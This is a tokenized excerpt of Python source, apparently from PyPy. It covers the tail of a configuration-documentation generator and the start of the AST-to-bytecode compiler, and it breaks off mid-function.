"<STR_LIT>" ) , <EOL> "<STR_LIT>" ) ) <EOL> if self . default is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , str ( self . default ) ) ) <EOL> elif self . defaultfactory is not None : <EOL> content . add ( ListItem ( Strong ( "<STR_LIT>" ) , <EOL> str ( self . defaultfactory ) ) ) <EOL> return content <EOL> class __extend__ ( OptionDescription ) : <EOL> def make_rest_doc ( self , path = "<STR_LIT>" ) : <EOL> fullpath = get_fullpath ( self , path ) <EOL> content = Rest ( <EOL> Title ( fullpath , abovechar = "<STR_LIT:=>" , belowchar = "<STR_LIT:=>" ) , <EOL> Directive ( "<STR_LIT>" ) ) <EOL> if path : <EOL> content . add ( <EOL> Paragraph ( Link ( "<STR_LIT>" , path + "<STR_LIT>" ) ) ) <EOL> content . join ( <EOL> Title ( "<STR_LIT>" ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . _name ) , <EOL> ListItem ( Strong ( "<STR_LIT>" ) , self . doc ) , <EOL> Title ( "<STR_LIT>" ) ) <EOL> stack = [ ] <EOL> prefix = fullpath <EOL> curr = content <EOL> config = Config ( self ) <EOL> for ending in self . getpaths ( include_groups = True ) : <EOL> subpath = fullpath + "<STR_LIT:.>" + ending <EOL> while not ( subpath . startswith ( prefix ) and <EOL> subpath [ len ( prefix ) ] == "<STR_LIT:.>" ) : <EOL> curr , prefix = stack . pop ( ) <EOL> print subpath , fullpath , ending , curr <EOL> sub , step = config . _cfgimpl_get_home_by_path ( ending ) <EOL> doc = getattr ( sub . _cfgimpl_descr , step ) . doc <EOL> if doc : <EOL> new = curr . add ( ListItem ( Link ( subpath + "<STR_LIT::>" , subpath + "<STR_LIT>" ) , <EOL> Em ( doc ) ) ) <EOL> else : <EOL> new = curr . add ( ListItem ( Link ( subpath + "<STR_LIT::>" , subpath + "<STR_LIT>" ) ) ) <EOL> stack . append ( ( curr , prefix ) ) <EOL> prefix = subpath <EOL> curr = new <EOL> return content <EOL> def _get_section_header ( cmdline , fullpath , subdescr ) : <EOL> txtfile = configdocdir . join ( fullpath + "<STR_LIT>" ) <EOL> print txtfile , <EOL> if not txtfile . check ( ) : <EOL> print "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> content = txtfile . read ( ) <EOL> if "<STR_LIT>" in content : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def make_cmdline_overview ( descr , title = True ) : <EOL> content = Rest ( ) <EOL> if title : <EOL> content . add ( <EOL> Title ( "<STR_LIT>" % ( descr . _name , ) , <EOL> abovechar = "<STR_LIT:=>" , belowchar = "<STR_LIT:=>" ) ) <EOL> cmdlines = [ ] <EOL> config = Config ( descr ) <EOL> for path in config . getpaths ( include_groups = False ) : <EOL> subconf , step = config . _cfgimpl_get_home_by_path ( path ) <EOL> fullpath = ( descr . _name + "<STR_LIT:.>" + path ) <EOL> prefix = fullpath . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> subdescr = getattr ( subconf . _cfgimpl_descr , step ) <EOL> cmdline = get_cmdline ( subdescr . cmdline , fullpath ) <EOL> if cmdline is not None : <EOL> header = _get_section_header ( cmdline , fullpath , subdescr ) <EOL> cmdlines . append ( ( header , cmdline , fullpath , subdescr ) ) <EOL> cmdlines . sort ( key = lambda x : ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] . strip ( "<STR_LIT:->" ) ) ) <EOL> currheader = "<STR_LIT>" <EOL> curr = content <EOL> for header , cmdline , fullpath , subdescr in cmdlines : <EOL> if header != currheader : <EOL> content . add ( Title ( header , abovechar = "<STR_LIT>" , belowchar = "<STR_LIT:=>" ) ) <EOL> curr = content . add ( Paragraph ( ) ) <EOL> currheader = header <EOL> curr . add ( ListItem ( Link ( cmdline + "<STR_LIT::>" , fullpath + "<STR_LIT>" ) , <EOL> Text ( subdescr . doc ) ) ) <EOL> return content <EOL> def register_config_role ( docdir ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> from docutils . parsers . rst import directives , states , roles <EOL> from py . __ . rest . directive import register_linkrole <EOL> except ImportError : <EOL> return <EOL> def config_role ( name , rawtext , text , lineno , inliner , options = { } , <EOL> content = [ ] ) : <EOL> from docutils import nodes <EOL> from pypy . config . pypyoption import get_pypy_config <EOL> from pypy . config . makerestdoc import get_cmdline <EOL> txt = docdir . join ( "<STR_LIT>" , text + "<STR_LIT>" ) <EOL> html = docdir . join ( "<STR_LIT>" , text + "<STR_LIT>" ) <EOL> assert txt . check ( ) <EOL> assert name == "<STR_LIT>" <EOL> sourcedir = py . path . local ( inliner . document . settings . _source ) . dirpath ( ) <EOL> curr = sourcedir <EOL> prefix = "<STR_LIT>" <EOL> while <NUM_LIT:1> : <EOL> relative = str ( html . relto ( curr ) ) <EOL> if relative : <EOL> break <EOL> curr = curr . dirpath ( ) <EOL> prefix += "<STR_LIT>" <EOL> config = get_pypy_config ( ) <EOL> h , n = config . _cfgimpl_get_home_by_path ( text ) <EOL> opt = getattr ( h . _cfgimpl_descr , n ) <EOL> cmdline = get_cmdline ( opt . cmdline , text ) <EOL> if cmdline is not None : <EOL> shortest_long_option = '<STR_LIT:X>' * <NUM_LIT:1000> <EOL> for cmd in cmdline . split ( ) : <EOL> if cmd . startswith ( '<STR_LIT>' ) and len ( cmd ) < len ( shortest_long_option ) : <EOL> shortest_long_option = cmd <EOL> text = shortest_long_option <EOL> target = prefix + relative <EOL> print text , target <EOL> reference_node = nodes . reference ( rawtext , text , name = text , refuri = target ) <EOL> return [ reference_node ] , [ ] <EOL> config_role . content = True <EOL> config_role . options = { } <EOL> roles . register_canonical_role ( "<STR_LIT>" , config_role ) </s>
<s> """<STR_LIT>""" <EOL> from pypy . interpreter . astcompiler import ast , assemble , symtable , consts , misc <EOL> from pypy . interpreter . astcompiler import optimize <EOL> from pypy . interpreter . pyparser . error import SyntaxError <EOL> from pypy . tool import stdlib_opcode as ops <EOL> from pypy . interpreter . pyparser import future <EOL> from pypy . interpreter . error import OperationError <EOL> from pypy . module . __builtin__ . __init__ import BUILTIN_TO_INDEX <EOL> def compile_ast ( space , module , info ) : <EOL> """<STR_LIT>""" <EOL> symbols = symtable . SymtableBuilder ( space , module , info ) <EOL> return TopLevelCodeGenerator ( space , module , symbols , info ) . assemble ( ) <EOL> name_ops_default = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_NAME , <EOL> ast . Store : ops . STORE_NAME , <EOL> ast . Del : ops . DELETE_NAME <EOL> } ) <EOL> name_ops_fast = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_FAST , <EOL> ast . Store : ops . STORE_FAST , <EOL> ast . Del : ops . DELETE_FAST <EOL> } ) <EOL> name_ops_deref = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_DEREF , <EOL> ast . Store : ops . STORE_DEREF , <EOL> } ) <EOL> name_ops_global = misc . dict_to_switch ( { <EOL> ast . Load : ops . LOAD_GLOBAL , <EOL> ast . Store : ops . STORE_GLOBAL , <EOL> ast . Del : ops . DELETE_GLOBAL <EOL> } ) <EOL> unary_operations = misc . dict_to_switch ( { <EOL> ast . Invert : ops . UNARY_INVERT , <EOL> ast . Not : ops . UNARY_NOT , <EOL> ast . UAdd : ops . UNARY_POSITIVE , <EOL> ast . USub : ops . UNARY_NEGATIVE <EOL> } ) <EOL> binary_operations = misc . dict_to_switch ( { <EOL> ast . Add : ops . BINARY_ADD , <EOL> ast . Sub : ops . BINARY_SUBTRACT , <EOL> ast . Mult : ops . BINARY_MULTIPLY , <EOL> ast . Mod : ops . BINARY_MODULO , <EOL> ast . Pow : ops . BINARY_POWER , <EOL> ast . LShift : ops . BINARY_LSHIFT , <EOL> ast . RShift : ops . BINARY_RSHIFT , <EOL> ast . BitOr : ops . BINARY_OR , <EOL> ast . BitAnd : ops . BINARY_AND , <EOL> ast . BitXor : ops . BINARY_XOR , <EOL> ast . FloorDiv : ops . BINARY_FLOOR_DIVIDE <EOL> } ) <EOL> inplace_operations = misc . dict_to_switch ( { <EOL> ast . Add : ops . INPLACE_ADD , <EOL> ast . Sub : ops . INPLACE_SUBTRACT , <EOL> ast . Mult : ops . INPLACE_MULTIPLY , <EOL> ast . Mod : ops . INPLACE_MODULO , <EOL> ast . Pow : ops . INPLACE_POWER , <EOL> ast . LShift : ops . INPLACE_LSHIFT , <EOL> ast . RShift : ops . INPLACE_RSHIFT , <EOL> ast . BitOr : ops . INPLACE_OR , <EOL> ast . BitAnd : ops . INPLACE_AND , <EOL> ast . BitXor : ops . INPLACE_XOR , <EOL> ast . FloorDiv : ops . INPLACE_FLOOR_DIVIDE <EOL> } ) <EOL> compare_operations = misc . dict_to_switch ( { <EOL> ast . Eq : <NUM_LIT:2> , <EOL> ast . NotEq : <NUM_LIT:3> , <EOL> ast . Lt : <NUM_LIT:0> , <EOL> ast . LtE : <NUM_LIT:1> , <EOL> ast . Gt : <NUM_LIT:4> , <EOL> ast . GtE : <NUM_LIT:5> , <EOL> ast . In : <NUM_LIT:6> , <EOL> ast . NotIn : <NUM_LIT:7> , <EOL> ast . Is : <NUM_LIT:8> , <EOL> ast . IsNot : <NUM_LIT:9> <EOL> } ) <EOL> subscr_operations = misc . dict_to_switch ( { <EOL> ast . AugLoad : ops . BINARY_SUBSCR , <EOL> ast . Load : ops . BINARY_SUBSCR , <EOL> ast . AugStore : ops . STORE_SUBSCR , <EOL> ast . Store : ops . STORE_SUBSCR , <EOL> ast . Del : ops . DELETE_SUBSCR <EOL> } ) <EOL> slice_operations = misc . dict_to_switch ( { <EOL> ast . AugLoad : ops . SLICE , <EOL> ast . Load : ops . SLICE , <EOL> ast . AugStore : ops . STORE_SLICE , <EOL> ast . Store : ops . STORE_SLICE , <EOL> ast . Del : ops . DELETE_SLICE <EOL> } ) <EOL> F_BLOCK_LOOP = <NUM_LIT:0> <EOL> F_BLOCK_EXCEPT = <NUM_LIT:1> <EOL> F_BLOCK_FINALLY = <NUM_LIT:2> <EOL> F_BLOCK_FINALLY_END = <NUM_LIT:3> <EOL> class PythonCodeGenerator ( assemble . PythonCodeMaker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , space , name , tree , lineno , symbols , compile_info ) : <EOL> self . scope = symbols . find_scope ( tree ) <EOL> assemble . PythonCodeMaker . __init__ ( self , space , name , lineno , <EOL> self . scope , compile_info ) <EOL> self . symbols = symbols <EOL> self . frame_blocks = [ ] <EOL> self . interactive = False <EOL> self . temporary_name_counter = <NUM_LIT:1> <EOL> self . _compile ( tree ) <EOL> def _compile ( self , tree ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def current_temporary_name ( self ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" % ( self . temporary_name_counter , ) <EOL> self . temporary_name_counter += <NUM_LIT:1> <EOL> assert self . scope . lookup ( name ) != symtable . SCOPE_UNKNOWN <EOL> return name <EOL> def sub_scope ( self , kind , name , node , lineno ) : <EOL> """<STR_LIT>""" <EOL> generator = kind ( self . space , name , node , lineno , self . symbols , <EOL> self . compile_info ) <EOL> return generator . assemble ( ) <EOL> def push_frame_block ( self , kind , block ) : <EOL> self . frame_blocks . append ( ( kind , block ) ) <EOL> def pop_frame_block ( self , kind , block ) : <EOL> actual_kind , old_block = self . frame_blocks . pop ( ) <EOL> assert actual_kind == kind and old_block is block , "<STR_LIT>" <EOL> def error ( self , msg , node ) : <EOL> raise SyntaxError ( msg , node . lineno , node . col_offset , <EOL> filename = self . compile_info . filename ) <EOL> def name_op ( self , identifier , ctx ) : <EOL> """<STR_LIT>""" <EOL> scope = self . scope . lookup ( identifier ) <EOL> op = ops . NOP <EOL> container = self . names <EOL> if scope == symtable . SCOPE_LOCAL : <EOL> if self . scope . can_be_optimized : <EOL> container = self . var_names <EOL> op = name_ops_fast ( ctx ) <EOL> elif scope == symtable . SCOPE_FREE : <EOL> op = name_ops_deref ( ctx ) <EOL> container = self . free_vars <EOL> elif scope == symtable . SCOPE_CELL : <EOL> try : <EOL> op = name_ops_deref ( ctx ) <EOL> except KeyError : <EOL> assert ctx == ast . Del <EOL> raise SyntaxError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( identifier , ) ) <EOL> container = self . cell_vars <EOL> elif scope == symtable . SCOPE_GLOBAL_IMPLICIT : <EOL> if self . scope . locals_fully_known : <EOL> op = name_ops_global ( ctx ) <EOL> elif scope == symtable . SCOPE_GLOBAL_EXPLICIT : <EOL> op = name_ops_global ( ctx ) <EOL> if op == ops . NOP : <EOL> op = name_ops_default ( ctx ) <EOL> self . emit_op_arg ( op , self . add_name ( container , identifier ) ) <EOL> def is_docstring ( self , node ) : <EOL> return isinstance ( node , ast . Expr ) and isinstance ( node . value , ast . Str ) <EOL> def _get_code_flags ( self ) : <EOL> return consts . CO_NEWLOCALS <EOL> def _handle_body ( self , body ) : <EOL> """<STR_LIT>""" <EOL> if body : <EOL> start = <NUM_LIT:0> <EOL> if self . is_docstring ( body [ <NUM_LIT:0> ] ) : <EOL> doc_expr = body [ <NUM_LIT:0> ] <EOL> assert isinstance ( doc_expr , ast . Expr ) <EOL> start = <NUM_LIT:1> <EOL> doc_expr . value . walkabout ( self ) <EOL> self . name_op ( "<STR_LIT>" , ast . Store ) <EOL> for i in range ( start , len ( body ) ) : <EOL> body [ i ] . walkabout ( self ) <EOL> return True <EOL> else : <EOL> return False <EOL> def visit_Module ( self , mod ) : <EOL> if not self . _handle_body ( mod . body ) : <EOL> self . first_lineno = self . lineno = <NUM_LIT:1> <EOL> def visit_Interactive ( self , mod ) : <EOL> self . interactive = True <EOL> self . visit_sequence ( mod . body ) <EOL> def visit_Expression ( self , mod ) : <EOL> self . add_none_to_final_return = False <EOL> mod . body . walkabout ( self ) <EOL> def _make_function ( self , code , num_defaults = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> code_index = self . add_const ( code ) <EOL> if code . co_freevars : <EOL> for free in code . co_freevars : <EOL> free_scope = self . scope . lookup ( free ) <EOL> if free_scope == symtable . SCOPE_CELL : <EOL> index = self . cell_vars [ free ] <EOL> else : <EOL> index = self . free_vars [ free ] <EOL> self . emit_op_arg ( ops . LOAD_CLOSURE , index ) <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , len ( code . co_freevars ) ) <EOL> self . emit_op_arg ( ops . LOAD_CONST , code_index ) <EOL> self . emit_op_arg ( ops . MAKE_CLOSURE , num_defaults ) <EOL> else : <EOL> self . emit_op_arg ( ops . LOAD_CONST , code_index ) <EOL> self . emit_op_arg ( ops . MAKE_FUNCTION , num_defaults ) <EOL> def visit_FunctionDef ( self , func ) : <EOL> self . update_position ( func . lineno , True ) <EOL> if func . decorators : <EOL> self . visit_sequence ( func . decorators ) <EOL> if func . args . defaults : <EOL> self . visit_sequence ( func . args . defaults ) <EOL> num_defaults = len ( func . args . defaults ) <EOL> else : <EOL> num_defaults = <NUM_LIT:0> <EOL> code = self . sub_scope ( FunctionCodeGenerator , func . name , func , <EOL> func . lineno ) <EOL> self . _make_function ( code , num_defaults ) <EOL> if func . decorators : <EOL> for i in range ( len ( func . decorators ) ) : <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:1> ) <EOL> self . name_op ( func . name , ast . Store ) <EOL> def visit_Lambda ( self , lam ) : <EOL> self . update_position ( lam . lineno ) <EOL> if lam . args . defaults : <EOL> self . visit_sequence ( lam . args . defaults ) <EOL> default_count = len ( lam . args . defaults ) <EOL> else : <EOL> default_count = <NUM_LIT:0> <EOL> code = self . sub_scope ( LambdaCodeGenerator , "<STR_LIT>" , lam , lam . lineno ) <EOL> self . _make_function ( code , default_count ) <EOL> def visit_ClassDef ( self , cls ) : <EOL> self . update_position ( cls . lineno , True ) <EOL> self . load_const ( self . space . wrap ( cls . name ) ) <EOL> if cls . bases : <EOL> bases_count = len ( cls . bases ) <EOL> self . visit_sequence ( cls . bases ) <EOL> else : <EOL> bases_count = <NUM_LIT:0> <EOL> self . emit_op_arg ( ops . BUILD_TUPLE , bases_count ) <EOL> code = self . sub_scope ( ClassCodeGenerator , cls . name , cls , cls . lineno ) <EOL> self . _make_function ( code , <NUM_LIT:0> ) <EOL> self . emit_op_arg ( ops . CALL_FUNCTION , <NUM_LIT:0> ) <EOL> self . emit_op ( ops . BUILD_CLASS ) <EOL> self . name_op ( cls . name , ast . Store ) <EOL> def _op_for_augassign ( self , op ) : <EOL> if op == ast . Div : <EOL> if self . compile_info . flags & consts . CO_FUTURE_DIVISION : <EOL> return ops . INPLACE_TRUE_DIVIDE <EOL> else : <EOL> return ops . INPLACE_DIVIDE <EOL> return inplace_operations ( op ) <EOL> def visit_AugAssign ( self , assign ) : <EOL> self . update_position ( assign . lineno , True ) <EOL> target = assign . target <EOL> if isinstance ( target , ast . Attribute ) : <EOL> attr = ast . Attribute ( target . value , target . attr , ast . AugLoad , <EOL> target . lineno , target . col_offset ) <EOL> attr . walkabout ( self ) <EOL> assign . value . walkabout ( self ) <EOL> self . emit_op ( self . _op_for_augassign ( assign . op ) ) <EOL> attr . ctx = ast . AugStore <EOL> attr . walkabout ( self ) <EOL> elif isinstance ( target , ast . Subscript ) : <EOL> sub = ast . Subscript ( target . value , target . slice , ast . AugLoad , <EOL> target . lineno , target . col_offset ) <EOL> sub . walkabout ( self ) <EOL> assign . value . walkabout ( self ) <EOL> self . emit_op ( self . _op_for_augassign ( assign . op ) ) <EOL> sub . ctx = ast . AugStore <EOL> sub . walkabout ( self ) <EOL> elif isinstance ( target , ast . Name ) : <EOL> self . name_op ( target . id , ast . Load ) <EOL> assign . value . walkabout ( self ) <EOL> self . emit_op ( self . _op_for_augassign ( assign . op ) ) <EOL> self . name_op ( target . id , ast . Store ) <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> def visit_Assert ( self , asrt ) : <EOL> self . update_position ( asrt . lineno ) <EOL> end = self . new_block ( ) <EOL> asrt . test . accept_jump_if ( self , True , end ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op_name ( ops . LOAD_GLOBAL , self . names , "<STR_LIT>" ) <EOL> if asrt . msg : <EOL> asrt . msg . walkabout ( self ) <EOL> self . emit_op_arg ( ops . RAISE_VARARGS , <NUM_LIT:2> ) <EOL> else : <EOL> self . emit_op_arg ( ops . RAISE_VARARGS , <NUM_LIT:1> ) <EOL> self . use_next_block ( end ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def _binop ( self , op ) : <EOL> if op == ast . Div : <EOL> if self . compile_info . flags & consts . CO_FUTURE_DIVISION : <EOL> return ops . BINARY_TRUE_DIVIDE <EOL> else : <EOL> return ops . BINARY_DIVIDE <EOL> return binary_operations ( op ) <EOL> def visit_BinOp ( self , binop ) : <EOL> self . update_position ( binop . lineno ) <EOL> binop . left . walkabout ( self ) <EOL> binop . right . walkabout ( self ) <EOL> self . emit_op ( self . _binop ( binop . op ) ) <EOL> def visit_Return ( self , ret ) : <EOL> self . update_position ( ret . lineno , True ) <EOL> if ret . value : <EOL> ret . value . walkabout ( self ) <EOL> else : <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op ( ops . RETURN_VALUE ) <EOL> def visit_Print ( self , pr ) : <EOL> self . update_position ( pr . lineno , True ) <EOL> have_dest = bool ( pr . dest ) <EOL> if have_dest : <EOL> pr . dest . walkabout ( self ) <EOL> if pr . values : <EOL> for value in pr . values : <EOL> if have_dest : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> value . walkabout ( self ) <EOL> self . emit_op ( ops . ROT_TWO ) <EOL> self . emit_op ( ops . PRINT_ITEM_TO ) <EOL> else : <EOL> value . walkabout ( self ) <EOL> self . emit_op ( ops . PRINT_ITEM ) <EOL> if pr . nl : <EOL> if have_dest : <EOL> self . emit_op ( ops . PRINT_NEWLINE_TO ) <EOL> else : <EOL> self . emit_op ( ops . PRINT_NEWLINE ) <EOL> elif have_dest : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> def visit_Delete ( self , delete ) : <EOL> self . update_position ( delete . lineno , True ) <EOL> self . visit_sequence ( delete . targets ) <EOL> def visit_If ( self , if_ ) : <EOL> self . update_position ( if_ . lineno , True ) <EOL> end = self . new_block ( ) <EOL> test_constant = if_ . test . as_constant_truth ( self . space ) <EOL> if test_constant == optimize . CONST_FALSE : <EOL> if if_ . orelse : <EOL> self . visit_sequence ( if_ . orelse ) <EOL> elif test_constant == optimize . CONST_TRUE : <EOL> self . visit_sequence ( if_ . body ) <EOL> else : <EOL> next = self . new_block ( ) <EOL> if_ . test . accept_jump_if ( self , False , next ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . visit_sequence ( if_ . body ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( next ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> if if_ . orelse : <EOL> self . visit_sequence ( if_ . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_Break ( self , br ) : <EOL> self . update_position ( br . lineno , True ) <EOL> for f_block in self . frame_blocks : <EOL> if f_block [ <NUM_LIT:0> ] == F_BLOCK_LOOP : <EOL> break <EOL> else : <EOL> self . error ( "<STR_LIT>" , br ) <EOL> self . emit_op ( ops . BREAK_LOOP ) <EOL> def visit_Continue ( self , cont ) : <EOL> self . update_position ( cont . lineno , True ) <EOL> if not self . frame_blocks : <EOL> self . error ( "<STR_LIT>" , cont ) <EOL> current_block , block = self . frame_blocks [ - <NUM_LIT:1> ] <EOL> if current_block == F_BLOCK_LOOP : <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , block , True ) <EOL> elif current_block == F_BLOCK_EXCEPT or current_block == F_BLOCK_FINALLY : <EOL> for i in range ( len ( self . frame_blocks ) - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> f_type , block = self . frame_blocks [ i ] <EOL> if f_type == F_BLOCK_LOOP : <EOL> self . emit_jump ( ops . CONTINUE_LOOP , block , True ) <EOL> break <EOL> if self . frame_blocks [ i ] [ <NUM_LIT:0> ] == F_BLOCK_FINALLY_END : <EOL> self . error ( "<STR_LIT>" "<STR_LIT>" , <EOL> cont ) <EOL> else : <EOL> self . error ( "<STR_LIT>" , cont ) <EOL> elif current_block == F_BLOCK_FINALLY_END : <EOL> self . error ( "<STR_LIT>" , cont ) <EOL> def visit_For ( self , fr ) : <EOL> self . update_position ( fr . lineno , True ) <EOL> start = self . new_block ( ) <EOL> cleanup = self . new_block ( ) <EOL> end = self . new_block ( ) <EOL> self . emit_jump ( ops . SETUP_LOOP , end ) <EOL> self . push_frame_block ( F_BLOCK_LOOP , start ) <EOL> fr . iter . walkabout ( self ) <EOL> self . emit_op ( ops . GET_ITER ) <EOL> self . use_next_block ( start ) <EOL> self . lineno_set = False <EOL> self . emit_jump ( ops . FOR_ITER , cleanup ) <EOL> fr . target . walkabout ( self ) <EOL> self . visit_sequence ( fr . body ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , start , True ) <EOL> self . use_next_block ( cleanup ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_LOOP , start ) <EOL> if fr . orelse : <EOL> self . visit_sequence ( fr . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_While ( self , wh ) : <EOL> self . update_position ( wh . lineno , True ) <EOL> test_constant = wh . test . as_constant_truth ( self . space ) <EOL> if test_constant == optimize . CONST_FALSE : <EOL> if wh . orelse : <EOL> self . visit_sequence ( wh . orelse ) <EOL> else : <EOL> end = self . new_block ( ) <EOL> anchor = None <EOL> if test_constant == optimize . CONST_NOT_CONST : <EOL> anchor = self . new_block ( ) <EOL> self . emit_jump ( ops . SETUP_LOOP , end ) <EOL> loop = self . new_block ( ) <EOL> self . push_frame_block ( F_BLOCK_LOOP , loop ) <EOL> self . use_next_block ( loop ) <EOL> if test_constant == optimize . CONST_NOT_CONST : <EOL> self . lineno_set = False <EOL> wh . test . accept_jump_if ( self , False , anchor ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . visit_sequence ( wh . body ) <EOL> self . emit_jump ( ops . JUMP_ABSOLUTE , loop , True ) <EOL> if test_constant == optimize . CONST_NOT_CONST : <EOL> self . use_next_block ( anchor ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_LOOP , loop ) <EOL> if wh . orelse : <EOL> self . visit_sequence ( wh . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_TryExcept ( self , te ) : <EOL> self . update_position ( te . lineno , True ) <EOL> exc = self . new_block ( ) <EOL> otherwise = self . new_block ( ) <EOL> end = self . new_block ( ) <EOL> self . emit_jump ( ops . SETUP_EXCEPT , exc ) <EOL> body = self . use_next_block ( ) <EOL> self . push_frame_block ( F_BLOCK_EXCEPT , body ) <EOL> self . visit_sequence ( te . body ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_EXCEPT , body ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , otherwise ) <EOL> self . use_next_block ( exc ) <EOL> for handler in te . handlers : <EOL> assert isinstance ( handler , ast . excepthandler ) <EOL> self . update_position ( handler . lineno , True ) <EOL> next_except = self . new_block ( ) <EOL> if handler . type : <EOL> self . emit_op ( ops . DUP_TOP ) <EOL> handler . type . walkabout ( self ) <EOL> self . emit_op_arg ( ops . COMPARE_OP , <NUM_LIT:10> ) <EOL> self . emit_jump ( ops . JUMP_IF_FALSE , next_except ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> if handler . name : <EOL> handler . name . walkabout ( self ) <EOL> else : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . visit_sequence ( handler . body ) <EOL> self . emit_jump ( ops . JUMP_FORWARD , end ) <EOL> self . use_next_block ( next_except ) <EOL> if handler . type : <EOL> self . emit_op ( ops . POP_TOP ) <EOL> self . emit_op ( ops . END_FINALLY ) <EOL> self . use_next_block ( otherwise ) <EOL> if te . orelse : <EOL> self . visit_sequence ( te . orelse ) <EOL> self . use_next_block ( end ) <EOL> def visit_TryFinally ( self , tf ) : <EOL> self . update_position ( tf . lineno , True ) <EOL> end = self . new_block ( ) <EOL> self . emit_jump ( ops . SETUP_FINALLY , end ) <EOL> body = self . use_next_block ( ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY , body ) <EOL> self . visit_sequence ( tf . body ) <EOL> self . emit_op ( ops . POP_BLOCK ) <EOL> self . pop_frame_block ( F_BLOCK_FINALLY , body ) <EOL> self . load_const ( self . space . w_None ) <EOL> self . use_next_block ( end ) <EOL> self . push_frame_block ( F_BLOCK_FINALLY_END , end ) <EOL> self . visit_sequence ( tf . finalbody ) <EOL> self . emit_op ( ops . END_FINALLY ) <EOL> self . pop_frame_block ( F_BLOCK_FINALLY_END , end ) <EOL> def _import_as ( self , alias ) : <EOL> source_name = alias . name <EOL> dot = source_name . find ( "<STR_LIT:.>" ) <EOL> if dot > <NUM_LIT:0> : <EOL> while True : <EOL> start = dot + <NUM_LIT:1> <EOL> dot = source_name . find ( "<STR_LIT:.>" , start ) <EOL> if dot < <NUM_LIT:0> : <EOL> end = len ( source_name ) <EOL> else : <EOL> end = dot <EOL> attr = source_name [ start : end ] <EOL> self . emit_op_name ( ops . LOAD_ATTR , self . names , attr ) <EOL> if dot < <NUM_LIT:0> : <EOL> break <EOL> self . name_op ( alias . asname , ast . Store ) <EOL> def visit_Import ( self , imp ) : <EOL> self . update_position ( imp . lineno , True ) <EOL> for alias in imp . names : <EOL> assert isinstance ( alias , ast . alias ) <EOL> if self . compile_info . flags & consts . CO_FUTURE_ABSOLUTE_IMPORT : <EOL> level = <NUM_LIT:0> <EOL> else : <EOL> level = - <NUM_LIT:1> <EOL> self . load_const ( self . space . wrap ( level ) ) <EOL> self . load_const ( self . space . w_None ) <EOL> self . emit_op_name ( ops . IMPORT_NAME , self . names , alias . name ) <EOL> if alias . asname : <EOL> self . _import_as ( alias ) <EOL> else : <EOL> dot = alias . name . find ( "<STR_LIT:.>" ) <EOL> if dot < <NUM_LIT:0> : <EOL> store_name = alias . name <EOL> else : <EOL> store_name = alias . name [ : dot ] <EOL> self . name_op ( store_name , ast . Store ) <EOL> def visit_ImportFrom ( self , imp ) : <EOL> self . update_position ( imp . lineno , True ) <EOL> space = self . space <EOL> first = imp . names [ <NUM_LIT:0> ] <EOL> assert isinstance ( first , ast . alias ) <EOL> star_import = len ( imp . names ) == <NUM_LIT:1> and first . name == "<STR_LIT:*>" <EOL> if imp . module == "<STR_LIT>" : <EOL> last_line , last_offset = self . compile_info . last_future_import <EOL> if imp . lineno > last_line or imp . lineno == last_line and imp . col_offset > last_offset : <EOL> self . error ( "<STR_LIT>" "<STR_LIT>" , imp ) <EOL> if star_import : <EOL> self . error ( "<STR_LIT>" , imp ) <EOL> for alias in imp . names : <EOL> assert isinstance ( alias , ast . alias ) <EOL> if alias . name not in future . futureFlags_2_5 . compiler_features : <EOL> if alias . name == "<STR_LIT>" : <EOL> self . error ( "<STR_LIT>" , imp ) <EOL> self . error ( "<STR_LIT>" % <EOL> ( alias . name , ) , imp ) <EOL> if imp . level == <NUM_LIT:0> and not self . compile_info . flags & consts . CO_FUTURE_ABSOLUTE_IMPORT : <EOL> level = - <NUM_LIT:1> <EOL> else : <EOL> level = imp . level <EOL> self . load_const ( space . wrap ( level ) ) <EOL> names_w = [ None ] * len ( imp . names ) <EOL> for i in range ( len ( imp . names ) ) : <EOL> alias = imp . names [ i ] <EOL> assert isinstance ( alias , ast . alias ) 